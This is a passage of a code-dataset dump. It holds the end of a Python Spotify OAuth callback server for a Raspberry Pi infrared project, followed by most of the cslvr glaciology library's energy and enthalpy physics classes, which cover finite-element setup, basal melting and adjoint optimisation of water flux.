state=state)\n\n self.send_response(302)\n self.send_header('Location', url)\n self.end_headers()\n return\n\n elif path == '/callback':\n result = self.callback_method(parsed_path.path, query, redirect_uri)\n self.send_response(302)\n self.send_header('Location', '/spotify1')\n self.end_headers()\n # self.end_headers()\n # message = result\n # self.wfile.write(message.encode('utf-8'))\n return\n\n elif path == '/spotify1':\n CallbackServer.spotify_client.get(\n '/v1/me/player/devices'\n )\n self.send_response(200)\n self.end_headers()\n message = 'devices'\n self.wfile.write(message.encode('utf-8'))\n return\n\n\n\n else:\n self.send_response(200)\n self.end_headers()\n message = query\n self.wfile.write(message.encode('utf-8'))\n return\n\n def ir1(self, name):\n print(f'ir1 {name}')\n CallbackServer.spotify_client.get_devices()\n CallbackServer.spotify_client.play_or_pause()\n\n def play(self):\n\n pass\n","repo_name":"naoki-iwami/rasprebby-pi-infrared","sub_path":"spotifyutil.py","file_name":"spotifyutil.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43700224086","text":"from __future__ import division\nfrom __future__ import print_function\nfrom builtins import range\nfrom dolfin import *\nfrom dolfin_adjoint import *\nfrom cslvr.inputoutput import get_text, print_text, print_min_max\nfrom cslvr.d3model import D3Model\nfrom cslvr.d2model import D2Model\nfrom cslvr.d1model import D1Model\nfrom cslvr.physics import Physics\nfrom cslvr.helper import VerticalBasis, VerticalFDBasis, \\\n raiseNotDefined\nfrom copy import deepcopy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport os\nimport json\n\n\n\n\n\n\nclass Energy(Physics):\n\t\"\"\"\n\tAbstract class outlines the structure of an energy conservation.\n\t\"\"\"\n\n\tdef __new__(self, model, *args, **kwargs):\n\t\t\"\"\"\n\t\tCreates and returns a new Energy object.\n\t\t\"\"\"\n\t\tinstance = Physics.__new__(self, model)\n\t\treturn instance\n\n\t# TODO: `energy_flux_mode` and `stabilization_method` are specific to the\n\t# D3Model energy solvers.\n\tdef __init__(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t stabilization_method = 'GLS'):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: INITIALIZING ENERGY :::\"\n\t\tprint_text(s, cls=self)\n\t\t# save the starting values, as other algorithms might change the\n\t\t# values to suit their requirements :\n\t\tif isinstance(solve_params, dict):\n\t\t\tpass\n\t\telif solve_params == None:\n\t\t\tsolve_params = self.default_solve_params()\n\t\t\ts = \"::: using default parameters :::\"\n\t\t\tprint_text(s, cls=self)\n\t\t\ts = json.dumps(solve_params, sort_keys=True, indent=2)\n\t\t\tprint_text(s, '230')\n\t\telse:\n\t\t\ts = \">>> Energy REQUIRES A 'dict' INSTANCE OF SOLVER \" + \\\n\t\t\t \"PARAMETERS, NOT %s <<<\"\n\t\t\tprint_text(s % type(solve_params) , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\tself.momentum_s = momentum\n\t\tself.solve_params_s = deepcopy(solve_params)\n\t\tself.transient_s = transient\n\t\tself.use_lat_bc_s = use_lat_bc\n\t\tself.energy_flux_mode_s = energy_flux_mode\n\t\tself.stabilization_method_s = stabilization_method\n\n\t\tself.T_ini = self.model.T.copy(True)\n\t\tself.W_ini = self.model.W.copy(True)\n\n\t\tself.initialize(model, momentum, solve_params, transient,\n\t\t use_lat_bc, energy_flux_mode, stabilization_method)\n\n\tdef initialize(self, model, momentum, solve_params=None, transient=False,\n\t use_lat_bc=False, energy_flux_mode='B_ring',\n\t stabilization_method='GLS', reset=False):\n\t\t\"\"\"\n\t\tHere we set up the problem, and do all of the differentiation and\n\t\tmemory allocation type stuff. Note that any Energy object *must*\n\t\tcall this method. See the existing child Energy objects for reference.\n\t\t\"\"\"\n\t\traiseNotDefined()\n\n\tdef make_transient(self, time_step):\n\t\t\"\"\"\n\t\tset the energy system to transient form.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS WITH TRANSIENT FORM :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tself.model.init_time_step(time_step)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = True,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = self.energy_flux_mode_s,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef make_steady_state(self):\n\t\t\"\"\"\n\t\tset the energy system to steady-state form.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS WITH STEADY-STATE FORM :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = False,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = self.energy_flux_mode_s,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef set_basal_flux_mode(self, mode):\n\t\t\"\"\"\n\t\treset the energy system to use zero energy basal flux.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS NEUMANN BASAL BC TO \" + \\\n\t\t \"\\'%s\\' :::\" % mode\n\t\tprint_text(s, cls=self)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = self.transient_s,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = mode,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef reset(self):\n\t\t\"\"\"\n\t\treset the energy system to the original configuration.\n\t\t\"\"\"\n\t\ts = \"::: RE-INITIALIZING ENERGY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tself.model.init_T(self.T_ini)\n\t\tself.model.init_W(self.W_ini)\n\n\t\tself.initialize(model = self.model,\n\t\t momentum = self.momentum_s,\n\t\t solve_params = self.solve_params_s,\n\t\t transient = self.transient_s,\n\t\t use_lat_bc = self.use_lat_bc_s,\n\t\t energy_flux_mode = self.energy_flux_mode_s,\n\t\t stabilization_method = self.stabilization_method_s,\n\t\t reset = True)\n\n\tdef color(self):\n\t\t\"\"\"\n\t\treturn the default color for this class.\n\t\t\"\"\"\n\t\treturn '213'\n\n\tdef get_ice_thermal_conductivity(self):\n\t\t\"\"\"\n\t\tReturns the thermal conductivity for ice.\n\t\t\"\"\"\n\t\treturn self.model.spy * 9.828 * exp(-0.0057*self.model.T)\n\n\tdef get_ice_heat_capacity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\treturn 146.3 + 7.253*self.model.T\n\n\tdef get_bulk_thermal_conductivity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tk_i = self.get_ice_thermal_conductivity()\n\t\tk_w = self.model.spy * self.model.k_w\n\t\tW = self.model.W\n\t\treturn (1-W)*k_i + W*k_w\n\n\tdef get_bulk_heat_capacity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tc_i = self.get_ice_heat_capacity()\n\t\tc_w = self.model.c_w\n\t\tW = self.model.W\n\t\treturn (1-W)*c_i + W*c_w\n\n\tdef get_bulk_density(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tW = self.model.W\n\t\trho_i = self.model.rho_i\n\t\trho_w = self.model.rho_w\n\t\treturn (1-W)*rho_i + W*rho_w\n\n\tdef get_enthalpy_gradient_conductivity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\t# coefficient for non-advective water flux (enthalpy-gradient) :\n\t\tk_c = conditional( gt(self.model.W, 0.0), self.model.k_0, 1 )\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\treturn k_c * k\n\n\tdef get_enthalpy_gradient_diffusivity(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tc = self.get_bulk_heat_capacity()\n\t\trho = self.get_bulk_density()\n\t\tkappa = self.get_enthalpy_gradient_conductivity()\n\t\treturn kappa / (rho*c)\n\n\tdef get_grid_peclet_number(self):\n\t\tr\"\"\"\n\t\tReturns the grid P\\'{e}clet number.\n\t\t\"\"\"\n\t\trho = self.get_bulk_density()\n\t\tc = self.get_bulk_heat_capacity()\n\t\tkappa = self.get_enthalpy_gradient_conductivity()\n\t\tu = self.momentum.get_velocity()\n\t\th = self.model.h\n\t\tut = rho*u - grad(kappa/c)\n\t\tu_norm = sqrt(dot(ut, ut) + DOLFIN_EPS)\n\t\treturn u_norm*h / (2*kappa/c)\n\n\tdef get_temperature_flux_vector(self):\n\t\t\"\"\"\n\t\tReturns the temperature flux vector.\n\t\t\"\"\"\n\t\tT = self.model.T\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\treturn k * grad(T)\n\n\tdef get_temperature_melting_flux_vector(self):\n\t\t\"\"\"\n\t\tReturns the temperature-melting flux vector.\n\t\t\"\"\"\n\t\tTm = self.model.T_melt\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\treturn k * grad(Tm)\n\n\tdef get_basal_melting_rate(self):\n\t\t\"\"\"\n\t\tReturns the basal melting rate.\n\t\t\"\"\"\n\t\tq_geo = self.model.q_geo # geothermal heat\n\t\tq_fric = self.model.q_fric # friction heat\n\t\tL_f = self.model.L_f # latent heat of freezing\n\t\trho_b = self.model.rhob # bulk density\n\t\tn_b = self.model.n_b # outward unit normal on B\n\t\tT = self.model.T # temperature\n\t\tk = self.get_ice_thermal_conductivity()\n\t\tq = k * grad(T) # heat flux\n\t\treturn (q_geo + q_fric - dot(q, n_b)) / (L_f * rho_b)\n\n\tdef get_internal_friction_heat(self):\n\t\t\"\"\"\n\t\tRetuns the internal friction heat; the strain heating.\n\t\t\"\"\"\n\t\t# collect the velocity vector to be of the same dimension os the model :\n\t\tu = self.momentum.get_velocity()\n\t\tepsdot = self.momentum.effective_strain_rate(u) + self.model.eps_reg\n\t\teta = self.momentum.get_viscosity(u)\n\t\treturn 4 * eta * epsdot\n\n\tdef get_external_friction_heat(self):\n\t\tr\"\"\"\n\t\tRetuns the external friction heat over the lower surface given by\n\n\t\t.. math::\n\n\t\t \\begin{align}\n\t\t q_{\\mathrm{fric}} = \\beta \\underline{u}_{\\Vert} \\cdot \\underline{u}_{\\Vert}\n\t\t \\end{align}\n\n\t\twith tangential component of velocity\n\t\t:math:`\\underline{u}_{\\Vert} = \\underline{u} - (\\underline{u} \\cdot \\hat{\\underline{n}} ) \\hat{\\underline{n}}`.\n\t\t\"\"\"\n\t\tu = self.momentum.get_velocity() # velocity\n\t\tB_ring = self.model.B_ring # lower suface-mass balance\n\t\tbeta = self.model.beta # friction coefficient\n\t\tn_b = self.model.n_b # outward unit normal on B\n\t\tu_t = u - dot(u,n_b) * n_b # tangential component of u\n\t\treturn beta * dot(u_t, u_t)\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tparams = {'solver' : 'mumps',\n\t\t 'use_surface_climate' : False}\n\t\treturn params\n\n\tdef solve_surface_climate(self):\n\t\t\"\"\"\n\t\tCalculates PDD, surface temperature given current model geometry and\n\t\tsaves to model.T_surface.\n\t\t\"\"\"\n\t\ts = \"::: solving surface climate :::\"\n\t\tprint_text(s, cls=self)\n\t\tmodel = self.model\n\n\t\tT_w = model.T_w(0)\n\t\tS = model.S.vector().get_local()\n\t\tlat = model.lat.vector().get_local()\n\t\tlon = model.lon.vector().get_local()\n\n\t\t# greenland :\n\t\tTn = 41.83 - 6.309e-3*S - 0.7189*lat - 0.0672*lon + T_w\n\n\t\t## antarctica :\n\t\t#Tn = 34.46 - 0.00914*S - 0.27974*lat\n\n\t\t# Apply the lapse rate to the surface boundary condition\n\t\tmodel.init_T_surface(Tn)\n\n\tdef adjust_S_ring(self):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: solving surface accumulation/ablation :::\"\n\t\tprint_text(s, cls=self)\n\t\tmodel = self.model\n\n\t\tT_w = model.T_w(0)\n\t\tT = model.T_surface.vector().get_local()\n\n\t\tS_ring = 2.5 * 2**((T-T_w)/10)\n\n\t\tif model.N_OMEGA_FLT > 0:\n\t\t\tshf_dofs = np.where(model.mask.vector().get_local() == 0.0)[0]\n\t\t\tS_ring[model.shf_dofs] = -100\n\n\t\tmodel.init_S_ring(S_ring)\n\n\tdef form_cost_ftn(self, kind='abs'):\n\t\t\"\"\"\n\t\tForms and returns a cost functional for use with adjoint.\n\t\tSaves to self.J.\n\t\t\"\"\"\n\t\ts = \"::: forming water-optimization cost functional :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\t\ttheta = self.get_unknown()\n\t\tthetam = model.theta\n\t\tdGamma_bg = model.dGamma_bg()\n\t\ttheta_c = model.theta_melt + model.Wc*model.L_f\n\n\t\tif kind == 'TV':\n\t\t\tself.J = sqrt((theta - theta_c)**2 + 1e-15) * dGamma_bg\n\t\t\tself.Jp = sqrt((thetam - theta_c)**2 + 1e-15) * dGamma_bg\n\t\t\ts = \" - using TV cost functional :::\"\n\t\telif kind == 'L2':\n\t\t\tself.J = 0.5 * (theta - theta_c)**2 * dGamma_bg\n\t\t\tself.Jp = 0.5 * (thetam - theta_c)**2 * dGamma_bg\n\t\t\ts = \" - using L2 cost functional :::\"\n\t\telif kind == 'abs':\n\t\t\tself.J = abs(theta - theta_c) * dGamma_bg\n\t\t\tself.Jp = abs(thetam - theta_c) * dGamma_bg\n\t\t\ts = \" - using absolute value objective functional :::\"\n\t\telse:\n\t\t\ts = \">>> ADJOINT OBJECTIVE FUNCTIONAL MAY BE 'TV', 'L2' \" + \\\n\t\t\t \"or 'abs', NOT '%s' <<<\" % kind\n\t\t\tprint_text(s, 'red', 1)\n\t\t\tsys.exit(1)\n\t\tprint_text(s, cls=self)\n\n\tdef calc_misfit(self):\n\t\t\"\"\"\n\t\tCalculates the misfit,\n\t\t\"\"\"\n\t\ts = \"::: calculating misfit L-infty norm ||theta - theta_c|| :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# set up functions for surface (s) and current objective (o) :\n\t\ttheta_s = Function(model.Q)\n\t\ttheta_o = Function(model.Q)\n\n\t\t# calculate L_inf norm :\n\t\ttheta_v = model.theta.vector().get_local()\n\t\ttheta_m_v = model.theta_melt.vector().get_local()\n\t\tWc_v = model.Wc.vector().get_local()\n\t\ttheta_c_v = theta_m_v + Wc_v * model.L_f(0)\n\t\ttheta_o.vector().set_local(np.abs(theta_v - theta_c_v))\n\t\ttheta_o.vector().apply('insert')\n\n\t\t# apply difference over only grounded surface :\n\t\tbc_theta = DirichletBC(model.Q, theta_o, model.ff, model.GAMMA_B_GND)\n\t\tbc_theta.apply(theta_s.vector())\n\n\t\t# calculate L_inf vector norm :\n\t\tD = MPI.max(mpi_comm_world(), theta_s.vector().max())\n\n\t\ts = \"||theta - theta_c|| : %.3E\" % D\n\t\tprint_text(s, '208', 1)\n\t\treturn D\n\n\tdef calc_functionals(self):\n\t\t\"\"\"\n\t\tUsed to facilitate printing the objective function in adjoint solves.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tR = assemble(self.Rp, annotate=False)\n\t\texcept AttributeError:\n\t\t\tR = 0.0\n\t\tJ = assemble(self.Jp, annotate=False)\n\t\tprint_min_max(R, 'R')\n\t\tprint_min_max(J, 'J')\n\t\treturn (R, J)\n\n\tdef calc_obj(self):\n\t\t\"\"\"\n\t\tUsed to facilitate printing the objective function in adjoint solves.\n\t\t\"\"\"\n\t\tJ = assemble(self.Jp, annotate=False)\n\t\tprint_min_max(J, 'J')\n\t\treturn J\n\n\tdef partition_energy(self, annotate=False):\n\t\t\"\"\"\n\t\tsolve for the water content model.W and temperature model.T.\n\t\t\"\"\"\n\t\t# TODO: the operation below breaks dolfin-adjoint annotation.\n\t\t# temperature solved with quadradic formula, using expression for c :\n\t\ts = \"::: calculating temperature :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\t\tT_w = model.T_w(0)\n\n\t\t# temperature is a quadradic function of energy :\n\t\ttheta_v = model.theta.vector().get_local()\n\t\tT_n_v = (-146.3 + np.sqrt(146.3**2 + 2*7.253*theta_v)) / 7.253\n\t\tT_v = T_n_v.copy()\n\t\tTp_v = T_n_v.copy()\n\n\t\t# create pressure-adjusted temperature for rate-factor :\n\t\tTp_v[Tp_v > T_w] = T_w\n\t\tmodel.init_Tp(Tp_v)\n\n\t\t# correct for the pressure-melting point :\n\t\tT_melt_v = model.T_melt.vector().get_local()\n\t\ttheta_melt_v = model.theta_melt.vector().get_local()\n\t\twarm = theta_v >= theta_melt_v\n\t\tcold = theta_v < theta_melt_v\n\t\tT_v[warm] = T_melt_v[warm]\n\t\tmodel.init_T(T_v)\n\n\t\t# water content solved diagnostically :\n\t\ts = \"::: calculating water content :::\"\n\t\tprint_text(s, cls=self)\n\t\tW_v = (theta_v - theta_melt_v) / model.L_f(0)\n\n\t\t# update water content :\n\t\tW_v[W_v < 0.0] = 0.0 # no water where frozen, please.\n\t\tW_v[W_v > 1.0] = 1.0 # no hot water, please.\n\t\tmodel.assign_variable(model.W0, model.W)\n\t\tmodel.init_W(W_v)\n\n\tdef optimize_water_flux(self, max_iter, bounds=(-1e8, 0), method='ipopt',\n\t adj_save_vars=None, adj_callback=None):\n\t\t\"\"\"\n\t\tdetermine the correct basal-mass balance saved (currently) to\n\t\t``model.B_ring``.\n\t\t\"\"\"\n\t\ts = '::: optimizing for water-flux in %i maximum iterations :::'\n\t\tprint_text(s % max_iter, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# reset entire dolfin-adjoint state :\n\t\tadj_reset()\n\n\t\t# starting time :\n\t\tt0 = time()\n\n\t\t# need this for the derivative callback :\n\t\tglobal counter\n\t\tcounter = 0\n\n\t\t# functional lists to be populated :\n\t\tglobal Rs, Js, Ds\n\t\tRs = []\n\t\tJs = []\n\t\tDs = []\n\n\t\t# now solve the control optimization problem :\n\t\ts = \"::: starting adjoint-control optimization with method '%s' :::\"\n\t\tprint_text(s % method, cls=self)\n\n\t\tdef eval_cb(I, B_ring):\n\t\t\ts = '::: adjoint objective eval post callback function :::'\n\t\t\tprint_text(s, cls=self)\n\t\t\tprint_min_max(I, 'I')\n\t\t\tprint_min_max(B_ring, 'B_ring')\n\n\t\t# objective gradient callback function :\n\t\tdef deriv_cb(I, dI, B_ring):\n\t\t\tglobal counter, Rs, Js\n\t\t\tif method == 'ipopt':\n\t\t\t\ts0 = '>>> '\n\t\t\t\ts1 = 'iteration %i (max %i) complete'\n\t\t\t\ts2 = ' <<<'\n\t\t\t\ttext0 = get_text(s0, 'red', 1)\n\t\t\t\ttext1 = get_text(s1 % (counter, max_iter), 'red')\n\t\t\t\ttext2 = get_text(s2, 'red', 1)\n\t\t\t\tif MPI.rank(mpi_comm_world())==0:\n\t\t\t\t\tprint(text0 + text1 + text2)\n\t\t\t\tcounter += 1\n\t\t\ts = '::: adjoint obj. gradient post callback function :::'\n\t\t\tprint_text(s, cls=self)\n\t\t\tprint_min_max(dI, 'dI/B_ring')\n\n\t\t\t# update the DA current velocity to the model for evaluation\n\t\t\t# purposes only; the model.assign_variable function is\n\t\t\t# annotated for purposes of linking physics models to the adjoint\n\t\t\t# process :\n\t\t\ttheta_opt = DolfinAdjointVariable(model.theta).tape_value()\n\t\t\tmodel.init_theta(theta_opt)\n\n\t\t\t# print functional values :\n\t\t\tmodel.B_ring.assign(B_ring, annotate=False)\n\t\t\tftnls = self.calc_functionals()\n\t\t\tD = self.calc_misfit()\n\n\t\t\t# functional lists to be populated :\n\t\t\tRs.append(ftnls[0])\n\t\t\tJs.append(ftnls[1])\n\t\t\tDs.append(D)\n\n\t\t\t# call that callback, if you want :\n\t\t\tif adj_callback is not None:\n\t\t\t\tadj_callback(I, dI, B_ring)\n\n\t\t# solve the momentum equations with annotation enabled :\n\t\ts = '::: solving forward problem for dolfin-adjoint annotatation :::'\n\t\tprint_text(s, cls=self)\n\t\tself.solve(annotate=True)\n\n\t\t# get the cost, regularization, and objective functionals :\n\t\tI = self.J\n\t\ttry:\n\t\t\tI += self.R\n\t\texcept AttributeError:\n\t\t\tprint_text(' - not using regularization -', cls=self)\n\n\t\t# define the control variable :\n\t\tm = Control(model.B_ring, value=model.B_ring)\n\n\t\t# state the minimization problem :\n\t\tF = ReducedFunctional(Functional(I), m, eval_cb_post=eval_cb,\n\t\t derivative_cb_post=deriv_cb)\n\n\t\t# optimize with scipy's fmin_l_bfgs_b :\n\t\tif method == 'l_bfgs_b':\n\t\t\tout = minimize(F, method=\"L-BFGS-B\", tol=1e-9, bounds=bounds,\n\t\t\t options={\"disp\" : True,\n\t\t\t \"maxiter\" : max_iter,\n\t\t\t \"gtol\" : 1e-5})\n\t\t\tB_ring_opt = out[0]\n\n\t\t# or optimize with IPOpt (preferred) :\n\t\telif method == 'ipopt':\n\t\t\ttry:\n\t\t\t\timport pyipopt\n\t\t\texcept ImportError:\n\t\t\t\tinfo_red(\"\"\"You do not have IPOPT and/or pyipopt installed.\n\t\t\t\t When compiling IPOPT, make sure to link against HSL,\n\t\t\t\t as it is a necessity for practical problems.\"\"\")\n\t\t\t\traise\n\t\t\tproblem = MinimizationProblem(F, bounds=bounds)\n\t\t\tparameters = {\"tol\" : 1e-8,\n\t\t\t \"acceptable_tol\" : 1e-6,\n\t\t\t \"maximum_iterations\" : max_iter,\n\t\t\t \"print_level\" : 5,\n\t\t\t \"ma97_order\" : \"metis\",\n\t\t\t \"ma86_order\" : \"metis\",\n\t\t\t \"linear_solver\" : \"ma57\"}\n\t\t\tsolver = IPOPTSolver(problem, parameters=parameters)\n\t\t\tB_ring_opt = solver.solve()\n\n\t\t# let's see it :\n\t\tprint_min_max(B_ring_opt, 'B_ring_opt')\n\n\t\t# extrude the flux up and make the optimal control variable available :\n\t\tB_ring_ext = model.vert_extrude(B_ring_opt, d='up')\n\t\tmodel.init_B_ring(B_ring_ext)\n\t\t#Control(model.B_ring).update(B_ring_ext) # FIXME: does this work?\n\n\t\t# save state to unique hdf5 file :\n\t\tif isinstance(adj_save_vars, list):\n\t\t\ts = '::: saving variables in list arg adj_save_vars :::'\n\t\t\tprint_text(s, cls=self)\n\t\t\tout_file = model.out_dir + 'w_opt.h5'\n\t\t\tfoutput = HDF5File(mpi_comm_world(), out_file, 'w')\n\t\t\tfor var in adj_save_vars:\n\t\t\t\tmodel.save_hdf5(var, f=foutput)\n\t\t\tfoutput.close()\n\n\t\t# calculate total time to compute\n\t\ttf = time()\n\t\ts = tf - t0\n\t\tm = s / 60.0\n\t\th = m / 60.0\n\t\ts = s % 60\n\t\tm = m % 60\n\t\ttext = \"time to optimize for water flux: %02d:%02d:%02d\" % (h,m,s)\n\t\tprint_text(text, 'red', 1)\n\n\t\t# save all the objective functional values :\n\t\td = model.out_dir + 'objective_ftnls_history/'\n\t\ts = '::: saving objective functionals to %s :::'\n\t\tprint_text(s % d, cls=self)\n\t\tif model.MPI_rank==0:\n\t\t\tif not os.path.exists(d):\n\t\t\t\tos.makedirs(d)\n\t\t\tnp.savetxt(d + 'time.txt', np.array([tf - t0]))\n\t\t\tnp.savetxt(d + 'Rs.txt', np.array(Rs))\n\t\t\tnp.savetxt(d + 'Js.txt', np.array(Js))\n\t\t\tnp.savetxt(d + 'Ds.txt', np.array(Ds))\n\n\t\t\tfig = plt.figure()\n\t\t\tax = fig.add_subplot(111)\n\t\t\t#ax.set_yscale('log')\n\t\t\tax.set_ylabel(r'$\\mathscr{J}\\left(\\theta\\right)$')\n\t\t\tax.set_xlabel(r'iteration')\n\t\t\tax.plot(np.array(Js), 'r-', lw=2.0)\n\t\t\tplt.grid()\n\t\t\tplt.savefig(d + 'J.png', dpi=100)\n\t\t\tplt.close(fig)\n\n\t\t\ttry:\n\t\t\t\tR = self.R\n\t\t\t\tfig = plt.figure()\n\t\t\t\tax = fig.add_subplot(111)\n\t\t\t\tax.set_yscale('log')\n\t\t\t\tax.set_ylabel(r'$\\mathscr{R}\\left(\\alpha\\right)$')\n\t\t\t\tax.set_xlabel(r'iteration')\n\t\t\t\tax.plot(np.array(Rs), 'r-', lw=2.0)\n\t\t\t\tplt.grid()\n\t\t\t\tplt.savefig(d + 'R.png', dpi=100)\n\t\t\t\tplt.close(fig)\n\t\t\texcept AttributeError:\n\t\t\t\tpass\n\n\t\t\tfig = plt.figure()\n\t\t\tax = fig.add_subplot(111)\n\t\t\t#ax.set_yscale('log')\n\t\t\tax.set_ylabel(r'$\\mathscr{D}\\left(\\theta\\right)$')\n\t\t\tax.set_xlabel(r'iteration')\n\t\t\tax.plot(np.array(Ds), 'r-', lw=2.0)\n\t\t\tplt.grid()\n\t\t\tplt.savefig(d + 'D.png', dpi=100)\n\t\t\tplt.close(fig)\n\n\tdef calc_bulk_density(self):\n\t\t\"\"\"\n\t\tCalculate the bulk density stored in ``model.rhob``.\n\t\t\"\"\"\n\t\t# calculate bulk density :\n\t\ts = \"::: calculating bulk density :::\"\n\t\tprint_text(s, cls=self)\n\t\tmodel = self.model\n\t\trhob = project(self.rho, annotate=False)\n\t\tmodel.assign_variable(model.rhob, rhob)\n\n\n\n\n\n\nclass Enthalpy(Energy):\n\t\"\"\"\n\t\"\"\"\n\tdef initialize(self, model, momentum,\n\t solve_params = None,\n\t transient = False,\n\t use_lat_bc = False,\n\t energy_flux_mode = 'B_ring',\n\t stabilization_method = 'GLS',\n\t reset = False):\n\t\t\"\"\"\n\t\tSet up energy equation residual.\n\t\t\"\"\"\n\t\tself.transient = transient\n\n\t\ts = \"::: INITIALIZING ENTHALPY PHYSICS :::\"\n\t\tprint_text(s, cls=self)\n\n\t\t# save the solver parameters and momentum instance :\n\t\tself.solve_params = solve_params\n\t\tself.momentum = momentum\n\t\tself.linear = True\n\n\t\t# save the state of basal boundary flux :\n\t\tself.energy_flux_mode = energy_flux_mode\n\n\t\t# create a facet function for temperate zone :\n\t\tself.ff = MeshFunction('size_t', model.mesh, 2, 0)\n\n\t\tmesh = model.mesh\n\t\tT = model.T\n\t\talpha = model.alpha\n\t\trho_w = model.rho_w\n\t\tL_f = model.L_f\n\t\tW = model.W\n\t\tT_m = model.T_melt\n\t\tB_ring = model.B_ring\n\t\tT_surface = model.T_surface\n\t\ttheta_surface = model.theta_surface\n\t\ttheta_float = model.theta_float\n\t\ttheta_app = model.theta_app\n\t\ttheta_0 = model.theta\n\t\tq_geo = model.q_geo\n\t\th = model.h\n\t\tdt = model.time_step\n\t\tdOmega = model.dOmega()\n\t\tdGamma_bg = model.dGamma_bg()\n\n\t\tself.Q = model.Q\n\n\t\tself.ass_theta = FunctionAssigner(model.Q, self.Q)\n\n\t\tself.set_unknown(Function(self.Q, name='energy.theta'))\n\t\tself.set_trial_function(TrialFunction(self.Q))\n\t\tself.set_test_function(TestFunction(self.Q))\n\n\t\t# define test and trial functions :\n\t\tpsi = self.get_test_function()\n\t\tdtheta = self.get_trial_function()\n\t\ttheta = self.get_unknown()\n\n\t\t# internal friction (strain heat) :\n\t\tQ = self.get_internal_friction_heat()\n\n\t\t# velocity :\n\t\tu = momentum.get_velocity()\n\n\t\t# bulk properties :\n\t\tc = self.get_bulk_heat_capacity()\n\t\tk = self.get_bulk_thermal_conductivity()\n\t\trho = self.get_bulk_density()\n\n\t\t# discontinuous with water, J/(a*m*K) :\n\t\tkappa = self.get_enthalpy_gradient_conductivity()\n\n\t\t# bulk enthalpy-gradient diffusivity\n\t\tXi = self.get_enthalpy_gradient_diffusivity()\n\n\t\t# frictional heating :\n\t\tq_fric = self.get_external_friction_heat()\n\n\t\t# basal heat-flux natural boundary condition :\n\t\tq_tm = self.get_temperature_melting_flux_vector()\n\t\tn = model.N\n\t\tg_w = dot(q_tm, n) + rho_w*L_f*B_ring\n\t\tg_n = q_geo + q_fric\n\t\tif energy_flux_mode == 'zero_energy' or energy_flux_mode == 'B_ring':\n\t\t\ts = \" - using B_ring-energy flux boundary condition -\"\n\t\t\tprint_text(s, cls=self)\n\t\t\tg_b = g_n - alpha*g_w\n\t\telif energy_flux_mode == 'temperate_zone_mark':\n\t\t\ts = \" - using temperate-zone mark energy flux boundary condition -\"\n\t\t\tprint_text(s, cls=self)\n\t\t\tg_b = g_n\n\t\telse:\n\t\t\ts = \">>> PARAMETER 'energy_flux_mode' MAY BE 'zero_energy', \" + \\\n\t\t\t \"'B_ring', or 'temperate_zone_mark', NOT '%s' <<<\"\n\t\t\tprint_text(s % energy_flux_mode , 'red', 1)\n\t\t\tsys.exit(1)\n\n\t\t# configure the module to run in steady state :\n\t\tif not transient:\n\t\t\tprint_text(\" - using steady-state formulation -\", cls=self)\n\t\t\tnu = 1.0\n\t\telse:\n\t\t\tprint_text(\" - using transient formulation -\", cls=self)\n\t\t\tnu = 0.5\n\n\t\t# form time-interpolated unknown :\n\t\ttheta_mid = nu*dtheta + (1 - nu)*theta_0\n\n\t\t# quasi-velocity (see Cummings et al., 2016)\n\t\tut = rho*u - grad(kappa/c)\n\t\tut_norm = sqrt(dot(ut, ut) + DOLFIN_EPS)\n\n\t\t# the Peclet number :\n\t\tPe = self.get_grid_peclet_number()\n\n\t\t# for linear elements :\n\t\tif model.order == 1:\n\t\t xi = 1/tanh(Pe) - 1/Pe\n\n\t\t# for quadradic elements :\n\t\telif model.order == 2:\n\t\t\txi_1 = 0.5*(1/tanh(Pe) - 2/Pe)\n\t\t\txi = ((3 + 3*Pe*xi_1)*tanh(Pe) - (3*Pe + Pe**2*xi_1)) \\\n\t\t\t\t / ((2 - 3*xi_1*tanh(Pe))*Pe**2)\n\n\t\t# intrinsic time parameter :\n\t\ttau = h*xi / (2 * 